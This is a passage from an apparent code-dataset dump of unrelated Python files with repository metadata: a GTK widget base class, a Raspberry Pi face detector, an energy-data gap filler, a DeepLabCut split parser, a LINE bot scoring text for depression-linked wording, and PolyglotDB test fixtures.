| 42.245902 | 194 | 0.653214 | 1,032 | 7,731 | 4.594961 | 0.125 | 0.088148 | 0.104175 | 0.094897 | 0.579291 | 0.491354 | 0.417756 | 0.400042 | 0.32771 | 0.279418 | 0 | 0.006882 | 0.210581 | 7,731 | 182 | 195 | 42.478022 | 0.770113 | 0.035442 | 0 | 0.314685 | 0 | 0 | 0.094145 | 0.039619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160839 | false | 0 | 0.013986 | 0 | 0.216783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
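A hedged sketch of how this helper is typically driven; the `app` object and the ContactGroup constructor fields are assumptions inferred from the imports and field names above:

# Hypothetical usage: ContactHelper expects app.wd to be a Selenium WebDriver.
from model.contact import ContactGroup

helper = ContactHelper(app)  # 'app' is an application fixture exposing a .wd driver
helper.add_new(ContactGroup(firstname="Anna", lastname="Novikova"))
contacts = helper.get_contact_list()  # cached ContactGroup rows from the home page
helper.delete_by_id(contacts[0].id)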
a9cde816018d4cde80fd4caa4025019fd37e3e92 | 2,377 | py | Python | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 26 | 2019-05-15T02:03:47.000Z | 2022-02-21T07:28:11.000Z | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 815 | 2019-05-10T12:31:52.000Z | 2022-03-31T12:56:26.000Z | src/ramstk/views/gtk3/widgets/widget.py | TahaEntezari/ramstk | f82e5b31ef5c4e33cc02252263247b99a9abe129 | [
"BSD-3-Clause"
] | 9 | 2019-04-20T23:06:29.000Z | 2022-01-24T21:21:04.000Z | # pylint: disable=non-parent-init-called
# -*- coding: utf-8 -*-
#
# ramstk.views.gtk3.widgets.widget.py is part of the RAMSTK Project
#
# All rights reserved.
# Copyright 2007 - 2020 Doyle Rowland doyle.rowland <AT> reliaqual <DOT> com
"""RAMSTK GTK3 Base Widget Module."""
# Standard Library Imports
from typing import Any, Dict
# RAMSTK Package Imports
from ramstk.views.gtk3 import GObject, _


class RAMSTKWidget:
    """The RAMSTK Base Widget class."""

    # Define private scalar class attributes.
    _default_height = -1
    _default_width = -1

    def __init__(self) -> None:
        """Create RAMSTK Base widgets."""
        GObject.GObject.__init__(self)

        # Initialize private dictionary attributes.

        # Initialize private list attributes.

        # Initialize private scalar attributes.

        # Initialize public dictionary attributes.
        self.dic_handler_id: Dict[str, int] = {"": 0}

        # Initialize public list attributes.

        # Initialize public scalar attributes.
        self.height: int = -1
        self.width: int = -1

    def do_set_properties(self, **kwargs: Any) -> None:
        """Set the properties of the RAMSTK widget.

        :param **kwargs: See below

        :Keyword Arguments:
            * *height* (int) -- height of the RAMSTKWidget().
            * *tooltip* (str) -- the tooltip, if any, for the widget.
                Default is a message to file a QA-type issue to have one added.
            * *width* (int) -- width of the RAMSTKWidget().
        :return: None
        :rtype: None
        """
        _can_focus = kwargs.get("can_focus", True)
        _height = kwargs.get("height", self._default_height)
        _tooltip = kwargs.get(
            "tooltip",
            _("Missing tooltip, please file a quality type issue to have one added."),
        )
        _width = kwargs.get("width", self._default_width)

        if _height == 0:
            _height = self._default_height
        if _width == 0:
            _width = self._default_width

        self.height = _height
        self.width = _width

        self.set_property("can-focus", _can_focus)  # type: ignore
        self.set_property("height-request", _height)  # type: ignore
        self.set_property("tooltip-markup", _tooltip)  # type: ignore
        self.set_property("width-request", _width)  # type: ignore
| 31.693333 | 86 | 0.619689 | 277 | 2,377 | 5.148014 | 0.375451 | 0.014025 | 0.042076 | 0.035764 | 0.091865 | 0.039271 | 0.039271 | 0 | 0 | 0 | 0 | 0.011021 | 0.274716 | 2,377 | 74 | 87 | 32.121622 | 0.816125 | 0.441313 | 0 | 0 | 0 | 0 | 0.119342 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
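A minimal subclass sketch; RAMSTKWidget is written as a mixin, so the concrete class must also inherit a GTK widget that provides set_property (Gtk.Button here is an illustrative assumption, as is Gtk being re-exported like GObject above):

# Hedged sketch: mix RAMSTKWidget into a concrete GTK widget.
from ramstk.views.gtk3 import Gtk


class RAMSTKButton(Gtk.Button, RAMSTKWidget):
    def __init__(self) -> None:
        RAMSTKWidget.__init__(self)


button = RAMSTKButton()
button.do_set_properties(height=30, width=200, tooltip="Save the record.")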
a9ce2c37b0bb5981068f798cd85b5e4ebcafdcc4 | 1,011 | py | Python | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | openCv/script.py | tfrere/bras | fb7ae3720dd6bae0ccb3b3b5ec59ab18e760f48b | [
"Unlicense"
] | null | null | null | from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import numpy as np
import cv2
import picamera.array
camera = PiCamera()
camera.resolution = (800, 600)
camera.framerate = 10
rawCapture = PiRGBArray(camera, size=(800, 600))
time.sleep(0.1)

face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')

for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
    img = frame.array
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in faces:
        img = cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)
        roi_gray = gray[y:y+h, x:x+w]
        roi_color = img[y:y+h, x:x+w]
        eyes = eye_cascade.detectMultiScale(roi_gray)
        for (ex, ey, ew, eh) in eyes:
            cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)
    cv2.imshow('img', img)
    key = cv2.waitKey(1) & 0xFF
    rawCapture.truncate(0)  # clear the stream buffer before the next frame
    if key == ord("q"):
        break
| 25.275 | 86 | 0.71909 | 168 | 1,011 | 4.238095 | 0.422619 | 0.008427 | 0.075843 | 0.106742 | 0.016854 | 0.016854 | 0 | 0 | 0 | 0 | 0 | 0.049887 | 0.127596 | 1,011 | 39 | 87 | 25.923077 | 0.75737 | 0 | 0 | 0 | 0 | 0 | 0.060396 | 0.034653 | 0 | 0 | 0.00396 | 0 | 0 | 1 | 0 | false | 0 | 0.206897 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
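One detail worth keeping in mind: rawCapture.truncate(0) must run on every iteration or capture_continuous fails on the next frame. A graceful-shutdown sketch for when the loop exits (same imports as above):

# Hedged cleanup sketch: release the preview window and the camera after the loop.
cv2.destroyAllWindows()
camera.close()  # PiCamera holds the camera resource until explicitly closed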
a9cedc2010c3c6ab49074b7411de9c5f5d16a0f4 | 3,801 | py | Python | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null | data_processing/fill_missing_data.py | irasus-technologies/EnergyBoost | c5fcd4ed58aedffe0c3c71cdc76f860c64bb1de1 | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
from datetime import datetime
# In[2]:
hh_df = pd.read_csv('home_ac/processed_hhdata_86_2.csv')
# print(hh_df.shape)
# hh_df.head(15)
hh_df.drop_duplicates(subset="localhour", keep=False, inplace=True)
print(hh_df.shape)

# In[3]:
hh_df['hour_index'] = 0
# hh_df.iloc[-50]

# In[4]:
used = ['localhour', 'use', 'temperature', 'cloud_cover', 'GH', 'is_weekday', 'month', 'hour', 'AC', 'DC', 'hour_index']
datarow = []

# In[5]:
hour_index = 0  # hour index
hour_value = 0
missing_count = 0
start_time = pd.to_datetime(hh_df['localhour'].iloc[0][:-3])
for index, row in hh_df.iterrows():
    row.localhour = row.localhour[:-3]
    # print(row.localhour)
    difference = (pd.to_datetime(row.localhour) - pd.to_datetime(hh_df['localhour'].iloc[0][:-3])).total_seconds() / 3600
    # print("index is difference", difference)
    if difference != hour_index:
        gap = difference - hour_index
        missing_count += gap
        # fill in the missing hours
        for i in range(int(gap)):
            print("\n---------------------------------------")
            print("missing data for hour index:", hour_index + i)
            # row.hour = (hour_index + i) % 24
            temprow = None
            # print("this is lastrow", lastrow)
            temprow = lastrow.copy()  # copy so each synthesized row is independent of lastrow
            # print("this is temprow", temprow)
            temprow.hour_index = hour_index + i
            # print("this is hour of lastrow", lastrow.hour)
            # temprow.hour = (hour_index + i) % 24
            current_time = start_time + pd.Timedelta(hour_index + i, unit='h')
            temprow.localhour = current_time
            temprow.hour = current_time.hour
            temprow.month = current_time.month
            temprow.is_weekday = int(datetime.strptime(str(current_time), "%Y-%m-%d %H:%M:%S").weekday() < 5)
            print("The inserted row is \n", temprow)
            # datarow.append(row[used])
            datarow.append(temprow[used])
            temprow = None
            # hour = None
            # print(datarow)
        hour_index = difference
    hour_index += 1
    row.hour_index = difference
    # hour_value = row.hour
    # print(row[used])
    # print("reach here")
    lastrow = row[used]
    datarow.append(row[used])
print("total missing hours",missing_count)
#------------------------------------------testing----------------------------
# hour_index=0 #hour index
# missing_count=0
# for index, row in hh_df.iterrows():
# #print(row.localhour)
# #row.month = float(pd.to_datetime(row.localhour[:-3]).month)
# #row.day = float(pd.to_datetime(row.localhour[:-3]).day)
# #data_hour = float(pd.to_datetime(row.localhour).hour-6)%24
# data_hour = float(pd.to_datetime(row.localhour[:-3]).hour)
# #print(data_hour)
# if data_hour != hour_index%24:
# print("we are missing hours for",row.localhour)
# missing_count += 1
# hour_index +=1
# hour_index += 1
# print("In total missing hours", missing_count)
# for index, row in hh_df.iterrows():
# #row.month = float(pd.to_datetime(row.localhour[:-3]).month)
# #row.day = float(pd.to_datetime(row.localhour[:-3]).day)
# print("------------")
# print(row.localhour)
# print(float(pd.to_datetime(row.localhour).hour-6)%24)
# print(float(pd.to_datetime(row.localhour[:-3]).hour))
# # print(pd.to_datetime(row.localhour))
# # print(pd.to_datetime(row.localhour).tz_localize('UTC'))
# # print(pd.to_datetime(row.localhour).tz_localize('UTC').tz_convert('US/Central'))
# # print(pd.to_datetime(row.localhour[:-3]).tz_localize('US/Central'))
# # print(pd.to_datetime(row.localhour)-pd.Timedelta('06:00:00'))
# In[6]:
df = pd.DataFrame(data=datarow, columns=used)
print(df.head())
df.to_csv('datanew/afterfix6.csv')
| 29.465116 | 115 | 0.61247 | 524 | 3,801 | 4.290076 | 0.219466 | 0.084075 | 0.085409 | 0.093416 | 0.381228 | 0.307384 | 0.284698 | 0.269128 | 0.204626 | 0.072954 | 0 | 0.019685 | 0.198106 | 3,801 | 128 | 116 | 29.695313 | 0.717848 | 0.468824 | 0 | 0.047619 | 0 | 0 | 0.147692 | 0.048718 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
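To make the gap arithmetic concrete: with a first timestamp of 2014-01-01 01:00, a row at 2014-01-01 04:00 gives difference = 3; if hour_index is 1 at that point, gap = 2 and two rows are synthesized for offsets 1 and 2 (02:00 and 03:00). A tiny self-contained check (pandas only; the timestamps are illustrative):

import pandas as pd

start = pd.to_datetime("2014-01-01 01:00")
row_time = pd.to_datetime("2014-01-01 04:00")
difference = (row_time - start).total_seconds() / 3600
assert difference == 3.0
# Timestamps filled for a gap starting at hour_index = 1:
print([start + pd.Timedelta(h, unit='h') for h in (1, 2)])  # 02:00 and 03:00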
a9d05630a781b58d240403429a6be895d1c2a315 | 1,375 | py | Python | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | 5 | 2022-01-13T15:06:45.000Z | 2022-01-28T19:39:54.000Z | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | null | null | null | scripts/parse.py | yeshaokai/mmpose_for_maDLC | 84efe0ff00de3d916086c8c5579eae17c1ef43cb | [
"Apache-2.0"
] | 1 | 2022-01-13T11:46:55.000Z | 2022-01-13T11:46:55.000Z | import pandas as pd
import pickle
import json
def extract_uncropped_name(filename):
    f = filename.split('/')[-1]
    video_source = filename.split('/')[-2]
    video_source = video_source.replace('_cropped', '')
    image_format = f.split('.')[-1]
    image_prefix = f.split('c')[0]
    new_name = video_source + '_' + image_prefix + '.' + image_format
    return new_name


csv_path = 'CollectedData_Daniel.csv'
all_data = pd.read_csv(csv_path)

for shuffle in [0, 1, 2]:
    docu_path = 'Documentation_data-MultiMouse_95shuffle{}.pickle'.format(shuffle)
    f = open(docu_path, 'rb')
    a = pickle.load(f)
    train_indices = a[1]
    test_indices = a[2]
    data = all_data.iloc[3:, 0].to_numpy()
    train_data = data[train_indices]
    test_data = data[test_indices]
    train_data_set = set()
    test_data_set = set()
    for e in test_data:
        test_data_set.add(extract_uncropped_name(e))
    for e in train_data:
        train_data_set.add(extract_uncropped_name(e))
    print('train dataset')
    # print(train_data_set)
    print(len(train_data_set))
    print('test dataset')
    # print(test_data_set)
    print(len(test_data_set))
    ret_obj = {}
    ret_obj['train_data'] = list(train_data_set)
    ret_obj['test_data'] = list(test_data_set)
    with open('3mouse_shuffule{}.json'.format(shuffle), 'w') as f:
        json.dump(ret_obj, f)
| 21.825397 | 82 | 0.664 | 203 | 1,375 | 4.182266 | 0.320197 | 0.08245 | 0.070671 | 0.040047 | 0.073027 | 0.073027 | 0.073027 | 0 | 0 | 0 | 0 | 0.012704 | 0.198545 | 1,375 | 62 | 83 | 22.177419 | 0.757713 | 0.031273 | 0 | 0 | 0 | 0 | 0.116541 | 0.070677 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.081081 | 0 | 0.135135 | 0.108108 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
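For instance, tracing extract_uncropped_name by hand on a DeepLabCut-style path (the path itself is illustrative): 'labeled-data/videoA_cropped/img0042c.png' splits into video source 'videoA', prefix 'img0042' and format 'png', giving:

# Hypothetical example path; note that split('c') assumes no 'c' occurs in the frame prefix.
print(extract_uncropped_name('labeled-data/videoA_cropped/img0042c.png'))
# -> videoA_img0042.png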
a9d0c58d713f7b758640446cf6d2d1ffe15cf420 | 6,766 | py | Python | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 17 | 2020-11-25T07:40:18.000Z | 2022-03-07T03:29:18.000Z | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 8 | 2020-12-18T13:23:59.000Z | 2021-10-03T21:41:50.000Z | Depression-Language-Evaluation/app.py | Melody-Lin/LokiHub | 349f087b9d3d9d3fd4117f6288b3524015702b77 | [
"MIT"
] | 43 | 2020-12-02T09:03:57.000Z | 2021-12-23T03:30:25.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import Flask, request, abort
from linebot import LineBotApi, WebhookHandler
from linebot.exceptions import InvalidSignatureError
from linebot.models import *
import json
from ArticutAPI import Articut
from decimal import Decimal, ROUND_HALF_UP
app = Flask(__name__)

# line bot info
with open("line_bot.json", encoding="utf-8") as f:
    linebotDICT = json.loads(f.read())
line_bot_api = LineBotApi(linebotDICT["line_bot_api"])
handler = WebhookHandler(linebotDICT["handler"])

# articut info
with open("account.json", encoding="utf-8") as f:
    accountDICT = json.loads(f.read())
articut = Articut(username=accountDICT["username"], apikey=accountDICT["apikey"])

# pronouns
with open("Dict/pronoun.json", encoding="utf-8") as f:
    pronounDICT = json.loads(f.read())

# absolute terms
with open("Dict/absolution.json", encoding="utf-8") as f:
    absolutionDICT = json.loads(f.read())

# negative terms
with open("Dict/negative.json", encoding="utf-8") as f:
    negativeDICT = json.loads(f.read())

# positive terms
with open("Dict/positive.json", encoding="utf-8") as f:
    positiveDICT = json.loads(f.read())

# other pronoun terms
with open("Dict/other_pronoun.json", encoding="utf-8") as f:
    otherpronounDICT = json.loads(f.read())


@app.route("/callback", methods=['POST'])
def callback():
    # get X-Line-Signature header value
    signature = request.headers['X-Line-Signature']
    # get request body as text
    body = request.get_data(as_text=True)
    app.logger.info("Request body: " + body)
    # handle webhook body
    try:
        handler.handle(body, signature)
    except InvalidSignatureError:
        abort(400)
    return 'OK'


# part-of-speech tags to ignore
ignorance = ["FUNC_conjunction", "FUNC_degreeHead", "FUNC_determiner", "FUNC_inner", "FUNC_inter", "FUNC_modifierHead", "FUNC_negation", "ASPECT"]
# depression index
index = 0


def wordExtractor(inputLIST, unify=True):
    '''
    Works with Articut()'s .getNounStemLIST(), .getVerbStemLIST() ... results;
    drops the position information and extracts only the words.
    '''
    resultLIST = []
    for i in inputLIST:
        if i == []:
            pass
        else:
            for e in i:
                resultLIST.append(e[-1])
    if unify == True:
        return sorted(list(set(resultLIST)))
    else:
        return sorted(resultLIST)


def MakePronoun(inputLIST, inputDICT):
    global index
    index = 0
    first_person = 0
    others = 0
    dictLen = 0
    for i in inputLIST:
        if i in pronounDICT["first"]:
            first_person += 1
        # else:
        #     others += 1
    inputDICT = inputDICT["result_obj"]
    for i in range(len(inputDICT)):
        for j in range(len(inputDICT[i])):
            if inputDICT[i][j]["pos"] not in ignorance:
                dictLen += 1
                # if inputDICT[i][j]["text"] in otherpronounDICT["others"]:
                #     others += 1
    msg = "[代名詞 使用情況]\n"
    msg += ("第一人稱:" + str(first_person) + '\n')
    # msg += ("其他人稱:" + str(others) + '\n')
    if first_person > 1:
        msg += ("第一人稱占比:" + str(Decimal(str((first_person/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
    else:
        first_person = 1
        msg += ("第一人稱占比:" + str(Decimal(str((first_person/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
    index += Decimal(str((first_person/dictLen)*25)).quantize(Decimal('.00'), ROUND_HALF_UP)
    return msg


def MakeAbsolution(inputDICT):
    global index
    absolute = 0
    dictLen = 0
    inputDICT = inputDICT["result_obj"]
    for i in range(len(inputDICT)):
        for j in range(len(inputDICT[i])):
            if inputDICT[i][j]["pos"] not in ignorance:
                dictLen += 1
                if inputDICT[i][j]["text"] in absolutionDICT["absolution"]:
                    absolute += 1
    msg = "\n[絕對性詞彙 使用情況]\n"
    msg += ("絕對性詞彙:" + str(absolute) + '\n')
    msg += ("絕對性詞彙占比:" + str(Decimal(str((absolute/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
    index += Decimal(str((absolute/dictLen)*54)).quantize(Decimal('.00'), ROUND_HALF_UP)
    return msg


def MakeDepression(inputDICT):
    global index
    depress = 0
    encourage = 0
    dictLen = 0
    inputDICT = inputDICT["result_obj"]
    for i in range(len(inputDICT)):
        for j in range(len(inputDICT[i])):
            if inputDICT[i][j]["pos"] not in ignorance:
                dictLen += 1
                if inputDICT[i][j]["text"] in negativeDICT["negative"]:
                    depress += 1
                elif inputDICT[i][j]["text"] in negativeDICT["death"]:
                    depress += 2
                elif inputDICT[i][j]["text"] in negativeDICT["medicine"]:
                    depress += 2
                elif inputDICT[i][j]["text"] in negativeDICT["disease"]:
                    depress += 2
                # elif inputDICT[i][j]["text"] in positiveDICT["positive"]:
                #     encourage += 1
    msg = "\n[負向詞彙 使用情況]\n"
    msg += ("負向詞彙:" + str(depress) + '\n')
    # msg += ("正向詞彙:" + str(encourage) + '\n')
    msg += ("負向詞彙占比:" + str(Decimal(str((depress/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%\n")
    # msg += ("正向詞彙占比:" + str(Decimal(str((encourage/dictLen)*100)).quantize(Decimal('.00'), ROUND_HALF_UP)) + "%")
    index += Decimal(str((depress/dictLen)*21)).quantize(Decimal('.00'), ROUND_HALF_UP)
    return msg


def MakeIndex():
    global index
    msg = "\n[憂鬱文本分析]\n"
    msg += ("憂鬱指數:" + str(index) + '\n')
    msg += ("提醒您:此工具的用途為分析有潛在憂鬱傾向的文本。若您的文本之憂鬱指數高於5.5,代表此文本與其他憂鬱文本的相似度較高。")
    return msg


@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
    inputSTR = event.message.text
    # input userDefinedDict
    mixedDICT = {**absolutionDICT, **negativeDICT, **positiveDICT, **otherpronounDICT}
    with open("mixedDICT.json", mode="w", encoding="utf-8") as f:
        json.dump(mixedDICT, f, ensure_ascii=False)
    # parse with userDefinedDict
    inputDICT = articut.parse(inputSTR, userDefinedDictFILE="./mixedDICT.json")
    inputLIST = articut.getPersonLIST(inputDICT)
    inputLIST = wordExtractor(inputLIST, unify=False)
    PronounMsg = MakePronoun(inputLIST, inputDICT)
    AbsolutionMsg = MakeAbsolution(inputDICT)
    DepressionMsg = MakeDepression(inputDICT)
    IndexMsg = MakeIndex()
    ResultMsg = PronounMsg + AbsolutionMsg + DepressionMsg + IndexMsg
    SendMsg = [TextSendMessage(text=ResultMsg)]
    line_bot_api.reply_message(event.reply_token, SendMsg)


import os

if __name__ == "__main__":
    port = int(os.environ.get('PORT', 5000))
    app.run(host='0.0.0.0', port=port)
| 37.175824 | 147 | 0.60065 | 790 | 6,766 | 5.06962 | 0.258228 | 0.032459 | 0.027466 | 0.027965 | 0.30387 | 0.29563 | 0.259925 | 0.238702 | 0.221973 | 0.161798 | 0 | 0.016526 | 0.248744 | 6,766 | 181 | 148 | 37.381215 | 0.770805 | 0.096364 | 0 | 0.277372 | 0 | 0 | 0.118446 | 0.013915 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051095 | false | 0.007299 | 0.058394 | 0 | 0.160584 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
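The scoring pipeline can be exercised without the LINE webhook; a hedged offline sketch (it requires the dictionaries above plus a valid Articut account, and it preserves the order MakePronoun -> MakeAbsolution -> MakeDepression -> MakeIndex, since MakePronoun resets the global index):

# Offline driver sketch; the sample sentence is illustrative.
def score_text(inputSTR):
    inputDICT = articut.parse(inputSTR)  # no user-defined dictionary, for brevity
    personLIST = wordExtractor(articut.getPersonLIST(inputDICT), unify=False)
    return (MakePronoun(personLIST, inputDICT) + MakeAbsolution(inputDICT)
            + MakeDepression(inputDICT) + MakeIndex())

# print(score_text("我覺得我什麼事都做不好"))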
a9d3366cae5cc9d2f3c4639160a38329df539f7f | 20,236 | py | Python | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | tests/conftest.py | msonderegger/PolyglotDB | 583fd8ec14c2e34807b45b9f15fa19cffa130bfa | [
"MIT"
] | null | null | null | import pytest
import os
import sys
from polyglotdb.io.types.parsing import (SegmentTier, OrthographyTier,
                                         GroupingTier, TextOrthographyTier,
                                         TranscriptionTier,
                                         TextTranscriptionTier, TextMorphemeTier,
                                         MorphemeTier)
from polyglotdb.io.parsers.base import BaseParser
from polyglotdb.io import (inspect_textgrid, inspect_fave, inspect_mfa, inspect_partitur)
from polyglotdb.corpus import CorpusContext
from polyglotdb.structure import Hierarchy
from polyglotdb.config import CorpusConfig


def pytest_addoption(parser):
    parser.addoption("--skipacoustics", action="store_true",
                     help="skip acoustic tests")


@pytest.fixture(scope='session')
def test_dir():
    base = os.path.dirname(os.path.abspath(__file__))
    generated = os.path.join(base, 'data', 'generated')
    if not os.path.exists(generated):
        os.makedirs(generated)
    return os.path.join(base, 'data')  # was tests/data


@pytest.fixture(scope='session')
def buckeye_test_dir(test_dir):
    return os.path.join(test_dir, 'buckeye')


@pytest.fixture(scope='session')
def results_test_dir(test_dir):
    results = os.path.join(test_dir, 'generated', 'results')
    os.makedirs(results, exist_ok=True)
    return results


@pytest.fixture(scope='session')
def timit_test_dir(test_dir):
    return os.path.join(test_dir, 'timit')


@pytest.fixture(scope='session')
def textgrid_test_dir(test_dir):
    return os.path.join(test_dir, 'textgrids')


@pytest.fixture(scope='session')
def praatscript_test_dir(test_dir):
    return os.path.join(test_dir, 'praat_scripts')

@pytest.fixture(scope='session')
def fave_test_dir(textgrid_test_dir):
    return os.path.join(textgrid_test_dir, 'fave')


@pytest.fixture(scope='session')
def mfa_test_dir(textgrid_test_dir):
    return os.path.join(textgrid_test_dir, 'mfa')


@pytest.fixture(scope='session')
def maus_test_dir(textgrid_test_dir):
    return os.path.join(textgrid_test_dir, 'maus')


@pytest.fixture(scope='session')
def labbcat_test_dir(textgrid_test_dir):
    return os.path.join(textgrid_test_dir, 'labbcat')


@pytest.fixture(scope='session')
def partitur_test_dir(test_dir):
    return os.path.join(test_dir, 'partitur')


@pytest.fixture(scope='session')
def text_transcription_test_dir(test_dir):
    return os.path.join(test_dir, 'text_transcription')


@pytest.fixture(scope='session')
def text_spelling_test_dir(test_dir):
    return os.path.join(test_dir, 'text_spelling')


@pytest.fixture(scope='session')
def ilg_test_dir(test_dir):
    return os.path.join(test_dir, 'ilg')


@pytest.fixture(scope='session')
def csv_test_dir(test_dir):
    return os.path.join(test_dir, 'csv')


@pytest.fixture(scope='session')
def features_test_dir(test_dir):
    return os.path.join(test_dir, 'features')


@pytest.fixture(scope='session')
def export_test_dir(test_dir):
    path = os.path.join(test_dir, 'export')
    if not os.path.exists(path):
        os.makedirs(path)
    return path


@pytest.fixture(scope='session')
def corpus_data_timed():
    levels = [SegmentTier('label', 'phone'),
              OrthographyTier('label', 'word'),
              GroupingTier('line', 'line')]
    phones = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('t', 0.2, 0.3), ('s', 0.3, 0.4),
              ('aa', 0.5, 0.6), ('r', 0.6, 0.7),
              ('k', 0.8, 0.9), ('uw', 0.9, 1.0), ('t', 1.0, 1.1),
              ('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.3), ('z', 2.3, 2.4),
              ('aa', 2.4, 2.5), ('r', 2.5, 2.6),
              ('t', 2.6, 2.7), ('uw', 2.7, 2.8),
              ('ay', 3.0, 3.1),
              ('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
    words = [('cats', 0.0, 0.4), ('are', 0.5, 0.7), ('cute', 0.8, 1.1),
             ('dogs', 2.0, 2.4), ('are', 2.4, 2.6), ('too', 2.6, 2.8),
             ('i', 3.0, 3.1), ('guess', 3.3, 3.6)]
    lines = [(0.0, 1.1), (2.0, 2.8), (3.0, 3.6)]
    levels[0].add(phones)
    levels[1].add(words)
    levels[2].add(lines)
    hierarchy = Hierarchy({'phone': 'word', 'word': 'line', 'line': None})
    parser = BaseParser(levels, hierarchy)
    data = parser.parse_discourse('test_timed')
    return data


@pytest.fixture(scope='session')
def subannotation_data():
    levels = [SegmentTier('label', 'phone'),
              OrthographyTier('label', 'word'),
              OrthographyTier('stop_information', 'phone')]
    levels[2].subannotation = True
    phones = [('k', 0.0, 0.1), ('ae', 0.1, 0.2), ('t', 0.2, 0.3), ('s', 0.3, 0.4),
              ('aa', 0.5, 0.6), ('r', 0.6, 0.7),
              ('k', 0.8, 0.9), ('u', 0.9, 1.0), ('t', 1.0, 1.1),
              ('d', 2.0, 2.1), ('aa', 2.1, 2.2), ('g', 2.2, 2.3), ('z', 2.3, 2.4),
              ('aa', 2.4, 2.5), ('r', 2.5, 2.6),
              ('t', 2.6, 2.7), ('uw', 2.7, 2.8),
              ('ay', 3.0, 3.1),
              ('g', 3.3, 3.4), ('eh', 3.4, 3.5), ('s', 3.5, 3.6)]
